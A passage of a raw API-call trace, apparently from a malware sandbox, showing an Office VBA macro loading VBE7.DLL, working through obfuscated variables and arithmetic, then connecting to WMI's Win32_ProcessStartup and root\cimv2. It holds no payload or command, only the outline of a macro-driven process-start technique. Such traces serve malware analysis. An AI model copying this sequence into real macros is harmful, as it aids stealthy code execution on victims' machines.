(in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3cc051e | out: _Dst=0x144ec0) returned 0x0 [0070.082] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="w4A4AwoD" | out: _Dst="w4A4AwoD") returned 0x0 [0070.082] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="w4A4AwoD") returned 9 [0070.082] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x9, _Src=0x3cc04f2 | out: _Dst=0x67c2d20) returned 0x0 [0070.082] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_w4A4AwoD" | out: _Dst="_B_var_w4A4AwoD") returned 0x0 [0070.082] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_w4A4AwoD") returned 16 [0070.083] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3cc04f2 | out: _Dst=0x144ec0) returned 0x0 [0070.083] IMalloc:Realloc (This=0x7fefec05380, pv=0x62fddf0, cb=0xc10) returned 0xb0351e0 [0070.083] IMalloc:Realloc (This=0x7fefec05380, pv=0xb0351e0, cb=0x1010) returned 0xafd8900 [0070.083] IMalloc:Realloc (This=0x7fefec05380, pv=0xafd8900, cb=0x1410) returned 0xafd8900 [0070.083] IMalloc:Realloc (This=0x7fefec05380, pv=0xafd8900, cb=0x1810) returned 0xafe1e90 [0070.083] IMalloc:Realloc (This=0x7fefec05380, pv=0xafe1e90, cb=0x1c10) returned 0xafe1e90 [0070.083] IMalloc:Realloc (This=0x7fefec05380, pv=0xafe1e90, cb=0x2010) returned 0xafe1e90 [0070.083] IMalloc:Realloc (This=0x7fefec05380, pv=0xafe1e90, cb=0x2410) returned 0xafe1e90 [0070.083] IMalloc:Free (This=0x7fefec05380, pv=0x680a820) [0070.083] GetCurrentProcess () returned 0xffffffffffffffff [0070.084] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6a19b98, dwSize=0x8) returned 1 [0070.084] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6a19148, dwSize=0x8) returned 1 [0070.084] GetCurrentProcess () returned 0xffffffffffffffff [0070.084] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6a19208, dwSize=0x8) returned 1 [0070.084] GetCurrentProcess () returned 0xffffffffffffffff [0070.084] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6a19a18, dwSize=0x8) returned 1 [0070.084] GetCurrentProcess () returned 0xffffffffffffffff [0070.084] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6a19ad8, dwSize=0x8) returned 1 [0070.084] GetCurrentProcess () returned 0xffffffffffffffff [0070.084] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6a19b98, dwSize=0x8) returned 1 [0070.084] GetCurrentProcess () returned 0xffffffffffffffff [0070.084] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafb5db8, dwSize=0x8) returned 1 [0070.084] SetErrorMode (uMode=0x8001) returned 0x8001 [0070.084] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0070.084] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x7fee3780000 [0070.085] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10018bca000001b8) returned 1 [0070.085] SetErrorMode (uMode=0x8001) returned 0x8001 [0070.085] GetProcAddress (hModule=0x7fee3780000, lpProcName=0x272) returned 0x7fee3ac2a80 [0070.085] GetCurrentProcess () returned 0xffffffffffffffff [0070.085] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafdb864, dwSize=0x4b) returned 1 [0070.085] RtlLookupFunctionEntry (in: ControlPc=0xafdb864, ImageBase=0x144da8, HistoryTable=0x144db0 | out: ImageBase=0x144da8, HistoryTable=0x144db0) returned 0x0 [0070.085] VirtualProtect (in: lpAddress=0xafdb864, dwSize=0x4c, flNewProtect=0x40, lpflOldProtect=0x144eac | out: lpflOldProtect=0x144eac*=0x4) returned 1 [0070.090] RtlAddFunctionTable (FunctionTable=0xafdb8bc, EntryCount=0x1, BaseAddress=0xafdb800, TargetGp=0x144eac) returned 1 [0070.090] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0070.090] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1462d8 | out: ppvObject=0x1462d8*=0x0) returned 0x80004002 [0070.090] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1462d0 | out: ppvObject=0x1462d0*=0x0) returned 0x80004002 [0070.090] IUnknown:Release (This=0xaf0b528) returned 0x4 [0070.090] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0070.090] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1462d8 | out: ppvObject=0x1462d8*=0x0) returned 0x80004002 [0070.090] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1462d0 | out: ppvObject=0x1462d0*=0x0) returned 0x80004002 [0070.090] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0070.090] IUnknown:AddRef (This=0xaf0b688) returned 0x3 [0070.090] IUnknown:QueryInterface (in: This=0xaf0b688, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1462d8 | out: ppvObject=0x1462d8*=0x0) returned 0x80004002 [0070.090] IUnknown:QueryInterface (in: This=0xaf0b688, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1462d0 | out: ppvObject=0x1462d0*=0x0) returned 0x80004002 [0070.090] IUnknown:Release (This=0xaf0b688) returned 0x2 [0070.090] VarCmp (pvarLeft=0xaeff6e0, pvarRight=0xaeff6c8, lcid=0x0, dwFlags=0x30001) returned 0x1 [0070.091] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaeff698, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0070.091] sqrt (_X=0x3) returned 0x41c0000000000000 [0070.091] VarDiv (in: pvarLeft=0xaeff650, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0070.091] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0070.091] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0070.091] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaeff378, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0070.091] VarCmp (pvarLeft=0xaeff348, pvarRight=0xaeff330, lcid=0x0, dwFlags=0x30001) returned 0x1 [0070.091] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaeff318, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0070.091] sqrt (_X=0x3) returned 0x41a0000000000000 [0070.091] VarDiv (in: pvarLeft=0xaeff2e8, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0070.091] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0070.091] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0070.091] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaeff270, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0070.091] VarCmp (pvarLeft=0xaeff240, pvarRight=0xaeff228, lcid=0x0, dwFlags=0x30001) returned 0x1 [0070.091] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaeff210, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0070.091] sqrt (_X=0x3) returned 0x41a0000000000000 [0070.091] VarDiv (in: pvarLeft=0xaeff1e0, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0070.091] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0070.091] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0070.091] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaeff168, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0070.091] VarCmp (pvarLeft=0xaeff138, pvarRight=0xaeff120, lcid=0x0, dwFlags=0x30001) returned 0x1 [0070.091] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaeff108, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0070.091] sqrt (_X=0x3) returned 0x41c0000000000000 [0070.091] VarDiv (in: pvarLeft=0xaeff0d8, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0070.091] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0070.091] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0070.091] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaeff060, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0070.092] VarCmp (pvarLeft=0xaeff030, pvarRight=0xaeff018, lcid=0x0, dwFlags=0x30001) returned 0x1 [0070.092] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaeff000, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0070.092] sqrt (_X=0x3) returned 0x41c0000000000000 [0070.092] VarDiv (in: pvarLeft=0xaefefd0, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0070.092] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0070.092] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0070.092] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefef58, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0070.092] VarAdd (in: pvarLeft=0xaefef28, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0070.092] VarAdd (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0070.092] VarAdd (in: pvarLeft=0xaeff620, pvarRight=0xaefef10, pvarResult=0xaeff5f0 | out: pvarResult=0xaeff5f0) returned 0x0 [0070.092] VarAdd (in: pvarLeft=0xaeff5f0, pvarRight=0xaeff608, pvarResult=0xaeff590 | out: pvarResult=0xaeff590) returned 0x0 [0070.092] VarAdd (in: pvarLeft=0xaeff590, pvarRight=0xaeff5a8, pvarResult=0xaeff560 | out: pvarResult=0xaeff560) returned 0x0 [0070.092] VarAdd (in: pvarLeft=0xaeff560, pvarRight=0xaeff578, pvarResult=0xaeff518 | out: pvarResult=0xaeff518) returned 0x0 [0070.092] VarAdd (in: pvarLeft=0xaeff518, pvarRight=0xaeff530, pvarResult=0xaeff500 | out: pvarResult=0xaeff500) returned 0x0 [0070.092] VarAdd (in: pvarLeft=0xaeff500, pvarRight=0xaeff4d0, pvarResult=0xaeff4e8 | out: pvarResult=0xaeff4e8) returned 0x0 [0070.092] VarAdd (in: pvarLeft=0xaeff4e8, pvarRight=0xaefeef8, pvarResult=0xaeff4b8 | out: pvarResult=0xaeff4b8) returned 0x0 [0070.092] VarAdd (in: pvarLeft=0xaeff4b8, pvarRight=0xaefeee0, pvarResult=0xaeff488 | out: pvarResult=0xaeff488) returned 0x0 [0070.092] VarAdd (in: pvarLeft=0xaeff488, pvarRight=0xaefeec8, pvarResult=0xaeff470 | out: pvarResult=0xaeff470) returned 0x0 [0070.092] VarAdd (in: pvarLeft=0xaeff470, pvarRight=0xaefeeb0, pvarResult=0xaeff458 | out: pvarResult=0xaeff458) returned 0x0 [0070.092] VarCmp (pvarLeft=0xaefee80, pvarRight=0xaefee68, lcid=0x0, dwFlags=0x30001) returned 0x1 [0070.092] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefee50, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0070.092] sqrt (_X=0x3) returned 0x41c0000000000000 [0070.092] VarDiv (in: pvarLeft=0xaefee20, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0070.092] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0070.092] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0070.092] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefeda8, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0070.092] VarCmp (pvarLeft=0xaefed78, pvarRight=0xaefed60, lcid=0x0, dwFlags=0x30001) returned 0x1 [0070.092] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefed48, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0070.092] sqrt (_X=0x3) returned 0x41b0000000000000 [0070.092] VarDiv (in: pvarLeft=0xaefed18, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0070.092] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0070.093] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0070.093] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefeca0, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0070.093] VarAdd (in: pvarLeft=0xaefec70, pvarRight=0xaefee98, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0070.093] VarAdd (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff680, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0070.093] VarAdd (in: pvarLeft=0xaeff620, pvarRight=0xaefec58, pvarResult=0xaeff5f0 | out: pvarResult=0xaeff5f0) returned 0x0 [0070.093] VarAdd (in: pvarLeft=0xaeff5f0, pvarRight=0xaeff638, pvarResult=0xaeff590 | out: pvarResult=0xaeff590) returned 0x0 [0070.093] VarAdd (in: pvarLeft=0xaeff590, pvarRight=0xaefec40, pvarResult=0xaeff560 | out: pvarResult=0xaeff560) returned 0x0 [0070.096] CreateBindCtx (in: reserved=0x0, ppbc=0x146568 | out: ppbc=0x146568*=0x680aac0) returned 0x0 [0070.098] MkParseDisplayName (in: pbc=0x680aac0, szUserName="winmgmts:Win32_ProcessStartup", pchEaten=0x146560, ppmk=0x146558 | out: pchEaten=0x146560, ppmk=0x146558*=0x65f9a70) returned 0x0 [0070.340] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x144170 | out: lpSystemTimeAsFileTime=0x144170*(dwLowDateTime=0x891ff500, dwHighDateTime=0x1d4f2cf)) [0070.340] GetCurrentProcessId () returned 0x8e8 [0070.341] GetCurrentThreadId () returned 0x8ec [0070.341] GetTickCount () returned 0x21563 [0070.341] QueryPerformanceCounter (in: lpPerformanceCount=0x144178 | out: lpPerformanceCount=0x144178*=19480767813) returned 1 [0070.341] malloc (_Size=0x100) returned 0x9179d90 [0070.342] DllGetClassObject (in: rclsid=0x41a75f0*(Data1=0x172bddf8, Data2=0xceea, Data3=0x11d1, Data4=([0]=0x8b, [1]=0x5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0x6, [6]=0xd9, [7]=0xb6)), riid=0x145930*(Data1=0x11a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x144c30 | out: ppv=0x144c30*=0x0) returned 0x80004002 [0070.342] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xd101370 [0070.342] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0070.342] DllGetClassObject (in: rclsid=0x41a75f0*(Data1=0x172bddf8, Data2=0xceea, Data3=0x11d1, Data4=([0]=0x8b, [1]=0x5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0x6, [6]=0xd9, [7]=0xb6)), riid=0x7fefebb6cd0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x145aa8 | out: ppv=0x145aa8*=0xd101370) returned 0x0 [0070.342] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xd101370 [0070.343] WinMGMTS:IClassFactory:CreateInstance (in: This=0xd101370, pUnkOuter=0x0, riid=0x7fefebbd650*(Data1=0x11a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x145af8 | out: ppvObject=0x145af8*=0xd1013d0) returned 0x0 [0070.344] GetVersionExW (in: lpVersionInformation=0x145820*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x20, dwBuildNumber=0x0, dwPlatformId=0xd100298, szCSDVersion="") | out: lpVersionInformation=0x145820*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0070.344] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Wbem\\Scripting", ulOptions=0x0, samDesired=0x1, phkResult=0x145810 | out: phkResult=0x145810*=0xba0) returned 0x0 [0070.350] RegQueryValueExW (in: hKey=0xba0, lpValueName="Default Impersonation Level", lpReserved=0x0, lpType=0x0, lpData=0x145804, lpcbData=0x145800*=0x4 | out: lpType=0x0, lpData=0x145804*=0x3, lpcbData=0x145800*=0x4) returned 0x0 [0070.351] RegCloseKey (hKey=0xba0) returned 0x0 [0070.351] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xd101390 [0070.351] GetSystemDirectoryW (in: lpBuffer=0xd101390, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0070.351] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\advapi32.dll", hFile=0x0, dwFlags=0x0) returned 0x7fefd710000 [0070.352] GetProcAddress (hModule=0x7fefd710000, lpProcName="DuplicateTokenEx") returned 0x7fefd71d310 [0070.352] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0070.352] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xd101390 [0070.352] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xd1013d0 [0070.352] WinMGMTS:IUnknown:Release (This=0xd101370) returned 0x0 [0070.352] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0070.352] WinMGMTS:IParseDisplayName:ParseDisplayName (in: This=0xd1013d0, pbc=0x680aac0, pszDisplayName="winmgmts:Win32_ProcessStartup", pchEaten=0x146508, ppmkOut=0x1464b0 | out: pchEaten=0x146508*=0x1d, ppmkOut=0x1464b0*=0x65f9a70) returned 0x0 [0070.353] _wcsnicmp (_String1="winmgmts:", _String2="WINMGMTS:", _MaxCount=0x9) returned 0 [0070.353] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xd1013f0 [0070.354] _wcsnicmp (_String1="W", _String2="{", _MaxCount=0x1) returned -4 [0070.354] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xd101430 [0070.354] CoCreateInstance (in: rclsid=0x7fee2a81738*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fee2a816c8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xd101460 | out: ppv=0xd101460*=0xd1014e0) returned 0x0 [0070.365] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xd101500 [0070.365] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xd101590 [0070.365] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xd101630 [0070.365] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0070.365] GetCurrentThreadId () returned 0x8ec [0070.366] _wcsnicmp (_String1="W", _String2="[", _MaxCount=0x1) returned 28 [0070.366] _wcsnicmp (_String1="W", _String2="!", _MaxCount=0x1) returned 86 [0070.366] CoCreateInstance (in: rclsid=0x7fee2a81698*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fee2a81688*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppv=0x1462f8 | out: ppv=0x1462f8*=0xd101670) returned 0x0 [0070.377] CoCreateInstance (in: rclsid=0x7fee2a81698*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fee2a81688*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppv=0x146218 | out: ppv=0x146218*=0xd101770) returned 0x0 [0070.377] WbemDefPath:IWbemPath:SetText (This=0xd101770, uMode=0x4, pszPath="Win32_ProcessStartup") returned 0x0 [0070.377] WbemDefPath:IUnknown:Release (This=0xd101770) returned 0x0 [0070.377] SysStringLen (param_1="Win32_ProcessStartup") returned 0x14 [0070.377] WbemDefPath:IWbemPath:SetText (This=0xd101670, uMode=0x4, pszPath="Win32_ProcessStartup") returned 0x0 [0070.378] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0xd101670, puCount=0x146258 | out: puCount=0x146258*=0x0) returned 0x0 [0070.378] WbemDefPath:IWbemPath:GetServer (in: This=0xd101670, puNameBufLength=0x146240*=0x0, pName=0x0 | out: puNameBufLength=0x146240*=0x2, pName=0x0) returned 0x0 [0070.378] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xd1017b0 [0070.378] WbemDefPath:IWbemPath:GetServer (in: This=0xd101670, puNameBufLength=0x146240*=0x2, pName="\x18b0\xd10" | out: puNameBufLength=0x146240*=0x2, pName=".") returned 0x0 [0070.378] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0070.378] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0070.378] GetCurrentThreadId () returned 0x8ec [0070.378] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Wbem\\Scripting", ulOptions=0x0, samDesired=0x1, phkResult=0x146128 | out: phkResult=0x146128*=0xbac) returned 0x0 [0070.379] RegQueryValueExW (in: hKey=0xbac, lpValueName="Default Namespace", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x146120*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x146120*=0x16) returned 0x0 [0070.379] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xd1017b0 [0070.379] RegQueryValueExW (in: hKey=0xbac, lpValueName="Default Namespace", lpReserved=0x0, lpType=0x0, lpData=0xd1017b0, lpcbData=0x146120*=0x16 | out: lpType=0x0, lpData=0xd1017b0*=0x72, lpcbData=0x146120*=0x16) returned 0x0 [0070.379] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xd1017d0 [0070.379] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0070.379] RegCloseKey (hKey=0xbac) returned 0x0 [0070.379] CoCreateInstance (in: rclsid=0x7fee2a81698*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fee2a81688*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppv=0x146160 | out: ppv=0x146160*=0xd1018b0) returned 0x0 [0070.379] SysStringLen (param_1=".") returned 0x1 [0070.379] WbemDefPath:IWbemPath:SetServer (This=0xd1018b0, Name=".") returned 0x0 [0070.380] WbemDefPath:IWbemPath:RemoveAllNamespaces (This=0xd1018b0) returned 0x0 [0070.380] WbemDefPath:IWbemPath:GetNamespaceAt (in: This=0xd1019b0, uIndex=0x0, puNameBufLength=0x1460b0*=0x0, pName=0x0 | out: puNameBufLength=0x1460b0*=0x5, pName=0x0) returned 0x0 [0070.380] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xd101ab0 [0070.380] WbemDefPath:IWbemPath:GetNamespaceAt (in: This=0xd1019b0, uIndex=0x0, puNameBufLength=0x1460b0*=0x5, pName="\x19c0\xd11" | out: puNameBufLength=0x1460b0*=0x5, pName="root") returned 0x0 [0070.381] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0070.381] WbemDefPath:IWbemPath:SetNamespaceAt (This=0xd1018b0, uIndex=0x0, pszName="root") returned 0x0 [0070.381] WbemDefPath:IWbemPath:SetNamespaceAt (This=0xd1018b0, uIndex=0x1, pszName="cimv2") returned 0x0 [0070.381] WbemLocator:IWbemLocator:ConnectServer (in: This=0xd1014e0, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale=0x0, lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1461f0 | out: ppNamespace=0x1461f0*=0xd113c48) returned 0x0 [0070.575] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xd113c60 [0070.575] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xd113d10 [0070.575] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xd113db0 [0070.575] WbemLocator:IUnknown:QueryInterface (in: 